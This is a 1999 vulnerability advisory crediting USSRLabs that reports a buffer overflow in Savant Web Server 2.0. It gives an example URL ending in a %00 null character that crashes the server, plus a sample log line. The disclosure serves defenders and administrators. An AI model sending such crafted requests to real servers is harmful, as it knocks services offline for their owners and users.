Savant Web Server 2.0 Denial of Service
Reported December 28, 1999 by
USSRLabs
VERSIONS AFFECTED
Savant Web Server 2.0

DESCRIPTION

Savant Web Server has a buffer overflow condition caused by  appending a NULL character to the end of a URL. The problem causes the server to crash.

Example:
http://www.s0mep00rs4p.com/%00/

The action is logged and looks similar to the entry below:

Attacker Ip - - \[28/Dec/1999:01:11:37 -0600\] "GET /%00/index.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.
htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.html" 301 279


VENDOR RESPONSE

None known at the time of this writing.

CREDITS
Discovered by
USSRLabs